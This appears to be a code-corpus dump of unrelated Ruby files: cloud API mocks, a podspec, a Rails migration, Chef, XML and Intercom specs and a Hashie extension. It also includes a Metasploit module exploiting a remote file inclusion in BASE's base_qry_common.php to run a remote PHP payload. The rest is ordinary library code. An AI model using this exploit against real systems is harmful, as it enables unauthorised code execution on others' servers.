:NetworkType => "Dmz", :BroadcastAddress => network_ip, :GatewayAddress => network_ip, :environment_id => environment_id, :Links => { :Link => [ Fog::Ecloud.keep(environment, :href, :name, :type), ] }, :IpAddresses => { :IpAddress => [], }, } ip_address = { :id => ip_address_id, :href => "/cloudapi/ecloud/ipaddresses/networks/#{network_id}/#{ip_address_id}", :name => ip_address_id, :type => "application/vnd.tmrk.cloud.ipAddress", :network_id => network_id, :Links => { :Link => [Fog::Ecloud.keep(network, :href, :name, :type)] }, :Reserved => "false", :Host => nil, :DetectedOn => nil } ip_address2 = ip_address.dup.merge(:id => ip_address2_id, :href => "/cloudapi/ecloud/ipaddresses/networks/#{network_id}/#{ip_address2_id}", :name => ip_address2_id) network[:IpAddresses][:IpAddress].push(ip_address).push(ip_address2) short_name = "solaris10_64guest" operating_system = { :short_name => short_name, :compute_pool_id => compute_pool_id, :href => "/cloudapi/ecloud/operatingsystems/#{short_name}/computepools/#{compute_pool_id}", :name => "Sun Solaris 10 (64-bit)", :type => "application/vnd.tmrk.cloud.operatingSystem", :FamilyName => "Solaris", :Links => { :Link => Fog::Ecloud.keep(compute_pool, :href, :name, :type), }, :ConfigurationOptions => { :Processor => { :Minimum => "1", :Maximum => "8", :StepFactor => "1" }, :Memory => { :MinimumSize => { :Unit => "MB", :Value => "800" }, :MaximumSize => { :Unit => "MB", :Value => "16384" }, :StepFactor => { :Unit => "MB", :Value => "4" } }, :Disk => { :Minimum => "1", :Maximum => "15", :SystemDisk => { :ResourceCapacityRange => { :MinimumSize => { :Unit => "GB", :Value => "1" }, :MaximumSize => { :Unit => "GB", :Value => "512" }, :StepFactor => { :Unit => "GB", :Value => "1" } }, :MonthlyCost => "0" }, :DataDisk => { :ResourceCapacityRange => { :MinimumSize => { :Unit => "GB", :Value => "1" }, :MaximumSize => { :Unit => "GB", :Value => "512" }, :StepFactor => { :Unit => "GB", :Value => "1" } }, :MonthlyCost => "0" } }, :NetworkAdapter => { :Minimum => "1", :Maximum => "4", :StepFactor => "1" } } } template = { :id => template_id, :href => "/cloudapi/ecloud/templates/#{template_id}/computepools/#{compute_pool_id}", :type => "application/vnd.tmrk.cloud.template", :name => "Sun Solaris 10 (x64)", :compute_pool_id => compute_pool_id, :OperatingSystem => Fog::Ecloud.keep(operating_system, :href, :name, :type), :Memory => { :MinimumSize => { :Unit => "MB", :Value => "800" }, :MaximumSize => { :Unit => "MB", :Value => "16384" }, :StepFactor => { :Unit => "MB", :Value => "4" } }, :Storage => { :Size => { :Unit => "GB", :Value => "7" } }, :NetworkAdapters => "1", :Links => { :Link => [ Fog::Ecloud.keep(compute_pool, :href, :name, :type), ] } } operating_system_family = { :id => operating_system_family_id, :compute_pool_id => compute_pool_id, :OperatingSystemFamily => { :Name => "Linux", :OperatingSystems => { :OperatingSystem => [Fog::Ecloud.keep(operating_system, :href, :name, :type)], } }, :Links => { :Link => [ Fog::Ecloud.keep(compute_pool, :href, :name, :type), ] } } ssh_key = { :id => ssh_key_id, :href => "/cloudapi/ecloud/admin/sshKeys/#{ssh_key_id}", :name => ssh_key_name, :admin_organization_id => organization_id, :Links => { :Link => [ Fog::Ecloud.keep(admin_organization, :href, :name, :type), Fog::Ecloud.keep(organization, :href, :name, :type), ] }, :Default => "true", :FingerPrint => Fog::Ecloud.mac_address } layout = { :id => environment_id, :href => "/cloudapi/ecloud/layout/environments/#{environment_id}", :type => "application/vnd.tmrk.cloud.deviceLayout", :Links => { :Link => [ Fog::Ecloud.keep(environment, :name, :href, :type), ], }, :Rows => { :Row => [ ], }, :environment_id => environment_id } { :compute_pools => { compute_pool_id => compute_pool }, :environments => { environment_id => environment }, :public_ips => { public_ip_id => public_ip }, :internet_services => { internet_service_id => internet_service }, :node_services => { node_service_id => node_service }, :networks => { network_id => network }, :organizations => { organization_id => organization }, :admin_organizations => { organization_id => admin_organization }, :operating_systems => { operating_system_id => operating_system }, :operating_system_families => { operating_system_family_id => operating_system_family }, :servers => {}, :tasks => {}, :templates => { template_id => template }, :ssh_keys => { ssh_key_id => ssh_key }, :detached_disks => {}, :template_href => (Fog.credentials[:ecloud_template_href] || "/cloudapi/ecloud/templates/#{template_id}/computepools/#{compute_pool_id}"), :rows => {}, :groups => {}, :layouts => { environment_id => layout } } end end end def self.reset @data = nil end def initialize(options = {}) @base_path = "/cloudapi/ecloud" @ecloud_api_key = options[:ecloud] end def data self.class.data[@ecloud_api_key] end def reset_data self.class.data.delete(@ecloud_api_key) end def response(params = {}) body = params[:body] headers = { "Content-Type" => "application/xml" }.merge(params[:headers] || {}) status = params[:status] || 200 response = Excon::Response.new(:body => body, :headers => headers, :status => status) if params.key?(:expects) && ![*params[:expects]].include?(response.status) e = Excon::Errors::NotFound.new("Expected([200]) <=> Actual(404 Not Found)", "404", response) raise ServiceError.slurp(e) else response end end def deep_copy(o) Marshal.load(Marshal.dump(o)) end end end end end
44.285548
190
0.447404
012ad4b5cd1796edd238a535da72b9d8dc96b50e
590
Pod::Spec.new do |s| s.name = "DPAppDoctor" s.version = "4.0.0" s.ios.deployment_target = '8.0' s.summary = "A delightful setting interface framework." s.homepage = "https://github.com/xiayuqingfeng/DPAppDoctor" s.license = { :type => "MIT", :file => "LICENSE" } s.author = { "涂鸦" => "[email protected]" } s.source = { :git => "https://github.com/xiayuqingfeng/DPAppDoctor.git", :tag => s.version } s.source_files = "DPAppDoctor_SDK/**/*.{h,m}" s.requires_arc = true s.frameworks = 'UIKit',"Foundation" s.dependency "FBRetainCycleDetector" end
36.875
98
0.637288
39e256e182ddcf882896878498cdb20cbfe2643d
153
class AddLocationToProjects < ActiveRecord::Migration[6.0] def change add_column :projects, :location, :string, null: false, default: "" end end
25.5
70
0.732026
39172e7ab9e53501bbc6bfc1e0035f6765768bcd
2,547
# # Author:: John Keiser (<[email protected]>) # Author:: Ho-Sheng Hsiao (<[email protected]>) # Copyright:: Copyright (c) 2012 Opscode, Inc. # License:: Apache License, Version 2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # require 'chef/chef_fs/file_system/file_system_entry' require 'chef/chef_fs/file_system/not_found_error' class Chef module ChefFS module FileSystem # ChefRepositoryFileSystemEntry works just like FileSystemEntry, # except can inflate Chef objects class ChefRepositoryFileSystemEntry < FileSystemEntry def initialize(name, parent, file_path = nil, data_handler = nil) super(name, parent, file_path) @data_handler = data_handler end def write_pretty_json=(value) @write_pretty_json = value end def write_pretty_json @write_pretty_json.nil? ? root.write_pretty_json : @write_pretty_json end def data_handler @data_handler || parent.data_handler end def chef_object begin return data_handler.chef_object(Chef::JSONCompat.parse(read)) rescue Chef::Log.error("Could not read #{path_for_printing} into a Chef object: #{$!}") end nil end def can_have_child?(name, is_dir) !is_dir && name[-5..-1] == '.json' end def write(file_contents) if file_contents && write_pretty_json && name[-5..-1] == '.json' file_contents = minimize(file_contents, self) end super(file_contents) end def minimize(file_contents, entry) object = Chef::JSONCompat.parse(file_contents) object = data_handler.normalize(object, entry) object = data_handler.minimize(object, entry) Chef::JSONCompat.to_json_pretty(object) end protected def make_child_entry(child_name) ChefRepositoryFileSystemEntry.new(child_name, self) end end end end end
31.060976
92
0.657244
017b6b629c675f71fde778571c7c3f5f5820f907
2,306
require 'spec_helper' describe Medie::Xml::Driver do context "when looking up the handler" do it "should accept pure application/xml" do Medie::Xml::Driver.new.can_handle?("application/xml").should be_true Medie::Xml::Driver.new.can_handle?("application/atom+xml").should be_true Medie::Xml::Driver.new.can_handle?("text/xml").should be_true end it "should not accept anything else" do Medie::Xml::Driver.new.can_handle?("application/xml2").should be_false end it "should accept profiles and options" do Medie::Xml::Driver.new.can_handle?("application/xml;profile=client").should be_true Medie::Xml::Driver.new.can_handle?("application/atom+xml;profile=client").should be_true Medie::Xml::Driver.new.can_handle?("text/xml;profile=client").should be_true end end context "when unmarshalling" do it "should return an empty hash if its empty" do result = Medie::Xml::Driver.new.unmarshal(nil) result.should be_empty result.should be_kind_of(Hash) result.should be_kind_of(Methodize) result.should be_kind_of(Medie::Linked) result.links.should be_kind_of(Medie::Xml::Links) end it "should return the unmarshalled Xml hash enhanced" do result = Medie::Xml::Driver.new.unmarshal("<name>guilherme</name>") result.should == {"name" => "guilherme"} result.should be_kind_of(Hash) result.should be_kind_of(Methodize) result.should be_kind_of(Medie::Linked) result.links.should be_kind_of(Medie::Xml::Links) end end context "when marshalling" do it "should return itself if its a string" do result = Medie::Xml::Driver.new.marshal("guilherme", nil) result.should == "guilherme" end it "should return the unmarshalled Xml hash enhanced" do lambda { Medie::Xml::Driver.new.marshal({"name" => "guilherme"}, nil) }. should raise_error("Trying to marshal a string into xml does not make sense: 'nameguilherme'") end it "should return the unmarshalled Xml hash enhanced" do hash = {"name" => {"first" => "guilherme"}} result = Medie::Xml::Driver.new.marshal(hash, nil) result.should == hash["name"].to_xml(:root => "name") end end end
33.911765
102
0.670859
03fe762b3fd618f52701ca56e0fe3be8bfba2928
1,685
require "spec_helper" describe Intercom::Company do let(:client) { Intercom::Client.new(token: 'token') } describe "when no response raises error" do it "on find" do client.expects(:get).with("/companies", {:company_id => "4"}).returns(nil) _(proc { client.companies.find(:company_id => "4")}).must_raise Intercom::HttpError end it "on find_all" do client.expects(:get).with("/companies", {}).returns(nil) _(proc { client.companies.all.each {|company| }}).must_raise Intercom::HttpError end it "on load" do client.expects(:get).with("/companies", {:company_id => "4"}).returns({"type" =>"user", "id" =>"aaaaaaaaaaaaaaaaaaaaaaaa", "company_id" => "4", "name" => "MyCo"}) company = client.companies.find(:company_id => "4") client.expects(:get).with("/companies/aaaaaaaaaaaaaaaaaaaaaaaa", {}).returns(nil) _(proc { client.companies.load(company)}).must_raise Intercom::HttpError end end it "finds a company" do client.expects(:get).with("/companies/531ee472cce572a6ec000006", {}).returns(test_company) company = client.companies.find(id: "531ee472cce572a6ec000006") _(company.name).must_equal("Blue Sun") end it "returns a collection proxy for listing contacts" do company = Intercom::Company.new("id" => "1") proxy = company.contacts _(proxy.resource_name).must_equal 'contacts' _(proxy.url).must_equal '/companies/1/contacts' _(proxy.resource_class).must_equal Intercom::Contact end it "deletes a company" do company = Intercom::Company.new("id" => "1") client.expects(:delete).with("/companies/1", {}) client.companies.delete(company) end end
37.444444
168
0.67181
f7d3d32a4a9a24eb79994f93d4b802ff0a01c9fe
136
require 'fog/core' module Fog module Glesys extend Fog::Provider service(:compute, 'glesys/compute', 'Compute') end end
11.333333
50
0.676471
61bc1da1406bbaea7c337aca7dbbea964f1aa77d
491
# Be sure to restart your server when you modify this file. # Version of your assets, change this if you want to expire all your assets. Rails.application.config.assets.version = '1.0' # Add additional assets to the asset load path # Rails.application.config.assets.paths << Emoji.images_path # Precompile additional assets. # application.js, application.scss.erb, and all non-JS/CSS in app/assets folder are already added. # Rails.application.config.assets.precompile += %w( search.js )
40.916667
98
0.769857
ac724d302c88ab352e1260404d676d2662c043ec
313
# frozen_string_literal: true require "test_helper" class Folio::Console::Index::PositionButtonsCellTest < Folio::Console::CellTest test "show" do page = create(:folio_page) html = cell("folio/console/index/position_buttons", page, as: :pages).(:show) assert html.has_css?(".btn-group") end end
26.083333
81
0.71885
1de21ef39f66c543ea2e4d85b2499d1bd468f379
309
require "eu_central_bank" module Initializer def self.configure_money_gem I18n.config.available_locales = :en I18n.locale = :en Money.locale_backend = :i18n Money.rounding_mode= BigDecimal::ROUND_HALF_UP Money.default_bank = EuCentralBank.new end end Initializer.configure_money_gem
22.071429
50
0.773463
1acd335a786d1dc3e7048899906cb5fac6189a58
2,177
class Anagramizer def anagram(word1, word2) word1_compare = word1.downcase.split('').sort.delete_if{|x| x.match(/[^a-z]/i)} word2_compare = word2.downcase.split('').sort.delete_if{|x| x.match(/[^a-z]/i)} if (word1_compare.none? {|e| e.match(/[aeiou]/i)}) || (word2_compare.none? {|e| e.match(/[aeiou]/i)}) "I don't think those are real words D:" elsif word1.downcase.split('').delete_if{|x| x.match(/[^a-z]/i)} == word2.downcase.split('').delete_if{|x| x.match(/[^a-z]/i)} "Hey, those are the same words!" elsif word1_compare == word2_compare "Those words are anagrams!" else antigram = true word1_compare.each do |word1_element| word2_compare.each do |word2_element| if word1_element == word2_element antigram = false end end end if antigram "Those words are antigrams O:" else shared_letters = [] word1_compare.each do |word1_element| if word2_compare.include? word1_element shared_letters.push(word1_element) end end shared_letters = shared_letters.uniq letter = "letters" if shared_letters.length == 1 letter = "letter" end "Those words are not anagrams, but they have #{shared_letters.length} #{letter} in common: #{shared_letters.join(' ')}" end end end def palindrome(word1, word2) word1_array = word1.downcase.split('').delete_if{|x| x.match(/[^a-z]/i)} word2_array = word2.downcase.split('').delete_if{|x| x.match(/[^a-z]/i)} word1_results = false word2_results = false if word1_array == word1_array.reverse word1_results = true end if word2_array == word2_array.reverse word2_results = true end if word1_results && word2_results "Both words/phrases are palindromes!" elsif word1_results && !word2_results "The first word/phrase is a palindrome but the second is not." elsif word2_results && !word1_results "The second word/phrase is a palindrome but the first is not." else "Neither word/phrase is a palindrome :(" end end end
36.283333
130
0.628388
bf47cd00cc50b1661c929de20a3720d6cff3c96b
34
module Less class Bool; end end
8.5
17
0.735294
1d0d72429d3890703b78cfb14992a3f6a33069d8
4,455
module Hashie module Extensions # IndifferentAccess gives you the ability to not care # whether your hash has string or symbol keys. Made famous # in Rails for accessing query and POST parameters, this # is a handy tool for making sure your hash has maximum # utility. # # One unique feature of this mixin is that it will recursively # inject itself into sub-hash instances without modifying # the actual class of the sub-hash. # # @example # class MyHash < Hash # include Hashie::Extensions::MergeInitializer # include Hashie::Extensions::IndifferentAccess # end # # h = MyHash.new(:foo => 'bar', 'baz' => 'blip') # h['foo'] # => 'bar' # h[:foo] # => 'bar' # h[:baz] # => 'blip' # h['baz'] # => 'blip' # module IndifferentAccess def self.included(base) Hashie::Extensions::Dash::IndifferentAccess::ClassMethods.tap do |extension| base.extend(extension) if base <= Hashie::Dash && !base.singleton_class.included_modules.include?(extension) end base.class_eval do alias_method :regular_writer, :[]= unless method_defined?(:regular_writer) alias_method :[]=, :indifferent_writer alias_method :store, :indifferent_writer %w(default update replace fetch delete key? values_at).each do |m| alias_method "regular_#{m}", m unless method_defined?("regular_#{m}") alias_method m, "indifferent_#{m}" end %w(include? member? has_key?).each do |key_alias| alias_method key_alias, :indifferent_key? end class << self def [](*) super.convert! end def try_convert(*) (hash = super) && self[hash] end end end end # This will inject indifferent access into an instance of # a hash without modifying the actual class. This is what # allows IndifferentAccess to spread to sub-hashes. def self.inject!(hash) (class << hash; self; end).send :include, IndifferentAccess hash.convert! end # Injects indifferent access into a duplicate of the hash # provided. See #inject! def self.inject(hash) inject!(hash.dup) end def convert_key(key) key.to_s end # Iterates through the keys and values, reconverting them to # their proper indifferent state. Used when IndifferentAccess # is injecting itself into member hashes. def convert! keys.each do |k| regular_writer convert_key(k), convert_value(regular_delete(k)) end self end def convert_value(value) if hash_lacking_indifference?(value) IndifferentAccess.inject!(value) elsif value.is_a?(::Array) value.replace(value.map { |e| convert_value(e) }) else value end end def indifferent_default(key = nil) return self[convert_key(key)] if key?(key) regular_default(key) end def indifferent_update(other_hash) return regular_update(other_hash) if hash_with_indifference?(other_hash) other_hash.each_pair do |k, v| self[k] = v end end def indifferent_writer(key, value) regular_writer convert_key(key), convert_value(value) end def indifferent_fetch(key, *args, &block) regular_fetch convert_key(key), *args, &block end def indifferent_delete(key) regular_delete convert_key(key) end def indifferent_key?(key) regular_key? convert_key(key) end def indifferent_values_at(*indices) indices.map { |i| self[i] } end def indifferent_access? true end def indifferent_replace(other_hash) (keys - other_hash.keys).each { |key| delete(key) } other_hash.each { |key, value| self[key] = value } self end protected def hash_lacking_indifference?(other) other.is_a?(::Hash) && !(other.respond_to?(:indifferent_access?) && other.indifferent_access?) end def hash_with_indifference?(other) other.is_a?(::Hash) && other.respond_to?(:indifferent_access?) && other.indifferent_access? end end end end
29.309211
118
0.601796
ffb2a4d2e803cf42b14cf1a8f923f7b0b512c1e9
349
class CreateGroups < ActiveRecord::Migration[5.2] def change create_table :groups do |t| t.string :name t.boolean :visible t.timestamps end add_index :groups, :name, unique: true create_table :groups_users do |t| t.integer :member_id, index: true t.integer :group_id, index: true end end end
19.388889
49
0.647564
bb5ffd1cc0d98ce3a1ae31bd6367358fab394aa6
1,492
require_relative('../../puppet/property/netscaler_truthy') Puppet::Type.newtype(:netscaler_responderglobal) do @doc = 'Activates the specified responder policy for all requests sent to the NetScaler appliance.' apply_to_device ensurable newparam(:name, :namevar => true) do desc "Name of the responder policy." end newproperty(:priority) do desc "Specifies the priority of the policy. Min = 1 Max = 2147483647" newvalues(/^\d+$/) munge do |value| Integer(value) end end newproperty(:goto_expression) do desc "Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE." end newproperty(:invoke_policy_label) do desc "Label of policy to invoke if the bound policy evaluates to true." end newproperty(:invoke_vserver_label) do desc "Label of lbvserver to invoke if the bound policy evaluates to true." end autorequire(:netscaler_responderpolicy) do self[:name] end autorequire(:netscaler_lbvserver) do self[:invoke_vserver_label] end autorequire(:netscaler_csvserver) do self[:invoke_vserver_label] end autorequire(:netscaler_responderpolicylabel) do self[:invoke_policy_label] end validate do if [ self[:invoke_policy_label], self[:invoke_vserver_label], ].compact.length > 1 err "Only one of invoke_policy_label, or invoke_vserver_label may be specified per bind." end end end
24.459016
135
0.723861
ed3834a76efdb29c9a4b30a7f310ff69a652e521
203
module Disc class Topic < DiscObject root :post_stream list :posts def self.find(id) response = Disc.request(:get, "/t/#{id}.json") self.new(response[:body]) end end end
16.916667
52
0.610837
1155be2b6673d354140684cfac6de25488cbdbba
433
$:.unshift File.expand_path('..', __FILE__) $:.unshift File.expand_path('../../lib', __FILE__) require 'simplecov' SimpleCov.start do add_filter 'vendor' end require 'rspec' require 'rack/test' require 'webmock/rspec' require 'omniauth' require 'omniauth-brapp' RSpec.configure do |config| config.include WebMock::API config.include Rack::Test::Methods config.extend OmniAuth::Test::StrategyMacros, :type => :strategy end
22.789474
67
0.741339
d50f0381bbbe6393f860cd8bd065935b25db58b8
3,756
=begin #Datadog API V1 Collection #Collection of all Datadog Public endpoints. The version of the OpenAPI document: 1.0 Contact: [email protected] Generated by: https://github.com/DataDog/datadog-api-client-ruby/tree/master/.generator Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License. This product includes software developed at Datadog (https://www.datadoghq.com/). Copyright 2020-Present Datadog, Inc. =end require 'date' require 'time' module DatadogAPIClient::V1 # Object describing the retry strategy to apply to a Synthetic test. class SyntheticsTestOptionsRetry include BaseGenericModel # Whether the object has unparsed attributes # @!visibility private attr_accessor :_unparsed # Number of times a test needs to be retried before marking a # location as failed. Defaults to 0. attr_accessor :count # Time interval between retries (in milliseconds). Defaults to # 300ms. attr_accessor :interval # Attribute mapping from ruby-style variable name to JSON key. # @!visibility private def self.attribute_map { :'count' => :'count', :'interval' => :'interval' } end # Returns all the JSON keys this model knows about # @!visibility private def self.acceptable_attributes attribute_map.values end # Attribute type mapping. # @!visibility private def self.openapi_types { :'count' => :'Integer', :'interval' => :'Float' } end # List of attributes with nullable: true # @!visibility private def self.openapi_nullable Set.new([ ]) end # Initializes the object # @param attributes [Hash] Model attributes in the form of hash # @!visibility private def initialize(attributes = {}) if (!attributes.is_a?(Hash)) fail ArgumentError, "The input argument (attributes) must be a hash in `DatadogAPIClient::V1::SyntheticsTestOptionsRetry` initialize method" end # check to see if the attribute exists and convert string to symbol for hash key attributes = attributes.each_with_object({}) { |(k, v), h| if (!self.class.attribute_map.key?(k.to_sym)) fail ArgumentError, "`#{k}` is not a valid attribute in `DatadogAPIClient::V1::SyntheticsTestOptionsRetry`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect end h[k.to_sym] = v } if attributes.key?(:'count') self.count = attributes[:'count'] end if attributes.key?(:'interval') self.interval = attributes[:'interval'] end end # Show invalid properties with the reasons. Usually used together with valid? # @return Array for valid properties with the reasons # @!visibility private def list_invalid_properties invalid_properties = Array.new invalid_properties end # Check to see if the all the properties in the model are valid # @return true if the model is valid # @!visibility private def valid? true end # Checks equality by comparing each attribute. # @param o [Object] Object to be compared # @!visibility private def ==(o) return true if self.equal?(o) self.class == o.class && count == o.count && interval == o.interval end # @see the `==` method # @param o [Object] Object to be compared # @!visibility private def eql?(o) self == o end # Calculates hash code according to all attributes. # @return [Integer] Hash code # @!visibility private def hash [count, interval].hash end end end
28.454545
226
0.662673
1d16b826bee225b516e359b7b4da99f50c732298
6,790
require 'test_helper' class CountryTest < ActiveSupport::TestCase test '.bounds returns the bounding box for the Country geometry' do country = FactoryGirl.create(:country, bounding_box: 'POLYGON ((-1 0, 0 1, 1 2, 1 0, -1 0))') assert_equal [[0, -1], [2, 1]], country.bounds end test '.without_geometry does not select the geometry columns' do country = FactoryGirl.create(:country) selected_country = Country.without_geometry.find(country.id) refute selected_country.has_attribute?(:bounding_box) end test '.as_indexed_json returns the Country as JSON' do region = FactoryGirl.create(:region, id: 987, name: 'North Manmerica') country = FactoryGirl.create(:country, id: 123, name: 'Manboneland', region: region) expected_json = { "id" => 123, "name" => 'Manboneland', "iso_3"=> 'MTX', "region_for_index" => { "name" => "North Manmerica" }, "region_name" => "North Manmerica" } assert_equal expected_json, country.as_indexed_json end test '.protected_areas returns the number of Protected Areas in the country' do country = FactoryGirl.create(:country) expected_pas = [ FactoryGirl.create(:protected_area, countries: [country]), FactoryGirl.create(:protected_area, countries: [country]) ] FactoryGirl.create(:protected_area) protected_areas = country.protected_areas assert_equal 2, protected_areas.count assert_same_elements expected_pas.map(&:id), protected_areas.pluck(:id) end test ".designations returns the designations for the Country's Protected Areas" do designation_1 = FactoryGirl.create(:designation, name: 'Lionel Messi') designation_2 = FactoryGirl.create(:designation, name: 'Robin Van Persie') designation_3 = FactoryGirl.create(:designation, name: 'Cristiano Ronaldo') country_1 = FactoryGirl.create(:country) country_2 = FactoryGirl.create(:country) country_3 = FactoryGirl.create(:country) FactoryGirl.create(:protected_area, designation: designation_1, countries: [country_1]) FactoryGirl.create(:protected_area, designation: designation_2, countries: [country_1]) FactoryGirl.create(:protected_area, designation: designation_2, countries: [country_2]) FactoryGirl.create(:protected_area, designation: designation_3, countries: [country_3]) assert_equal 2, country_1.designations.count end test '.protected_areas_with_iucn_categories returns all Protected Areas with valid IUCN categories' do iucn_category_1 = FactoryGirl.create(:iucn_category, name: 'Ib') iucn_category_2 = FactoryGirl.create(:iucn_category, name: 'V') invalid_iucn_category = FactoryGirl.create(:iucn_category, name: 'Pepe') country_1 = FactoryGirl.create(:country) country_2 = FactoryGirl.create(:country) country_3 = FactoryGirl.create(:country) FactoryGirl.create(:protected_area, iucn_category: iucn_category_1, countries: [country_1] ) FactoryGirl.create(:protected_area, iucn_category: iucn_category_2, countries: [country_1]) FactoryGirl.create(:protected_area, iucn_category: invalid_iucn_category, countries: [country_2]) FactoryGirl.create(:protected_area, iucn_category: iucn_category_2, countries: [country_3]) assert_equal 2, country_1.protected_areas_with_iucn_categories.count end test '#data_providers returns all countries that provide PA data' do country_1 = FactoryGirl.create(:country) country_2 = FactoryGirl.create(:country) FactoryGirl.create(:country) FactoryGirl.create(:protected_area, countries: [country_1]) FactoryGirl.create(:protected_area, countries: [country_2]) assert_equal 2, Country.data_providers.count end test '#random_protected_areas, given an integer, returns the given number of random pas' do country = FactoryGirl.create(:country) country_pas = 2.times.map{ FactoryGirl.create(:protected_area, countries: [country]) } 2.times{ FactoryGirl.create(:protected_area) } random_pas = country.random_protected_areas 2 assert_same_elements country_pas, random_pas end test '#protected_areas_per_designation returns groups of pa counts per designation' do designation_1 = FactoryGirl.create(:designation) designation_2 = FactoryGirl.create(:designation) country = FactoryGirl.create(:country) expected_groups = [{ 'designation_id' => designation_1.id, 'designation_name' => designation_1.name, 'count' => 2 }, { 'designation_id' => designation_2.id, 'designation_name' => designation_2.name, 'count' => 3 }] 2.times { FactoryGirl.create(:protected_area, countries: [country], designation: designation_1) } 3.times { FactoryGirl.create(:protected_area, countries: [country], designation: designation_2) } assert_same_elements expected_groups, country.protected_areas_per_designation.to_a end test '#protected_areas_per_iucn_category returns groups of pa counts per iucn_category' do iucn_category_1 = FactoryGirl.create(:iucn_category, name: 'Ib') iucn_category_2 = FactoryGirl.create(:iucn_category, name: 'V') country = FactoryGirl.create(:country) expected_groups = [{ 'iucn_category_id' => iucn_category_1.id, 'iucn_category_name' => iucn_category_1.name, 'count' => 2, 'percentage' => '40.00' }, { 'iucn_category_id' => iucn_category_2.id, 'iucn_category_name' => iucn_category_2.name, 'count' => 3, 'percentage' => '60.00' }] 2.times { FactoryGirl.create(:protected_area, countries: [country], iucn_category: iucn_category_1) } 3.times { FactoryGirl.create(:protected_area, countries: [country], iucn_category: iucn_category_2) } assert_same_elements expected_groups, country.protected_areas_per_iucn_category.to_a end test '#protected_areas_per_governance returns groups of pa counts per governance' do governance_1 = FactoryGirl.create(:governance, name: 'Regional') governance_2 = FactoryGirl.create(:governance, name: 'International') country = FactoryGirl.create(:country) expected_groups = [{ 'governance_id' => governance_1.id, 'governance_name' => governance_1.name, 'governance_type' => nil, 'count' => 2, 'percentage' => '40.00' }, { 'governance_id' => governance_2.id, 'governance_name' => governance_2.name, 'governance_type' => nil, 'count' => 3, 'percentage' => '60.00' }] 2.times { FactoryGirl.create(:protected_area, countries: [country], governance: governance_1) } 3.times { FactoryGirl.create(:protected_area, countries: [country], governance: governance_2) } assert_same_elements expected_groups, country.protected_areas_per_governance.to_a end end
39.476744
105
0.723859
b98cde2df610d304b3ffd9db754ea15717b7ea26
651
include_recipe 'download-setups-s3::auth_files' directory node['download_setups_s3']['pro']['local_path'] do recursive true action :create end aws_s3_file node['download_setups_s3']['pro']['src_path'] do bucket node['download_setups_s3']['bucket'] region node['download_setups_s3']['region'] remote_path node['download_setups_s3']['pro']['remote_path'] end if node['platform'] == 'windows' seven_zip_archive 'extract pro setup' do path node['download_setups_s3']['pro']['local_path'] source node['download_setups_s3']['pro']['src_path'] action :extract not_if { ::File.exist?(node['arcgis']['pro']['setup']) } end end
29.590909
62
0.711214
5dc533ba23a7d5bec61069c91c206915c2b114ac
1,952
## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::PHPInclude def initialize(info = {}) super(update_info(info, 'Name' => 'BASE base_qry_common Remote File Include.', 'Description' => %q{ This module exploits a remote file inclusion vulnerability in the base_qry_common.php file in BASE 1.2.4 and earlier. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2685' ], [ 'OSVDB', '49366'], [ 'BID', '18298' ], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, 'Space' => 32768, }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Jun 14 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]), ], self.class) end def php_exploit timeout = 0.01 uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) print_status("Trying uri #{uri}") response = send_request_raw( { 'global' => true, 'uri' => uri, },timeout) if response and response.code != 200 print_error("Server returned non-200 status code (#{response.code})") end handler end end
25.025641
148
0.599385
f82a3b01706bf286f36bf6d3f82c54c858da04e2
29
module Admins::TopHelper end
9.666667
24
0.827586
6aa03d52fdd3101b022f16ae44cd99b621784787
491
require 'scorched' require_relative './common' class App < Scorched::Controller get '/' do render :index end controller '/artist/:id' do before do @artist = Artist[captures[:id]] check_access(@artist) end get '/' do render :artist end post '/' do @artist.update(request.POST) end delete '/' do @artist.destroy end after method!: 'GET' do redirect "?#{request.request_method}" end end end run App
14.441176
43
0.588595
ffc9ad81a596834a42491401b099ab0e99234248
1,235
=begin #Ory APIs #Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. The version of the OpenAPI document: v0.0.1-alpha.30 Contact: [email protected] Generated by: https://openapi-generator.tech OpenAPI Generator version: 5.2.1 =end require 'date' require 'time' module OryClient class SelfServiceVerificationFlowState CHOOSE_METHOD = "choose_method".freeze SENT_EMAIL = "sent_email".freeze PASSED_CHALLENGE = "passed_challenge".freeze # Builds the enum from string # @param [String] The enum value in the form of the string # @return [String] The enum value def self.build_from_hash(value) new.build_from_hash(value) end # Builds the enum from string # @param [String] The enum value in the form of the string # @return [String] The enum value def build_from_hash(value) constantValues = SelfServiceVerificationFlowState.constants.select { |c| SelfServiceVerificationFlowState::const_get(c) == value } raise "Invalid ENUM value #{value} for class #SelfServiceVerificationFlowState" if constantValues.empty? value end end end
31.666667
177
0.74413
91a0db08d5ba778d88bcda7bd78ba64a9697add6
7,228
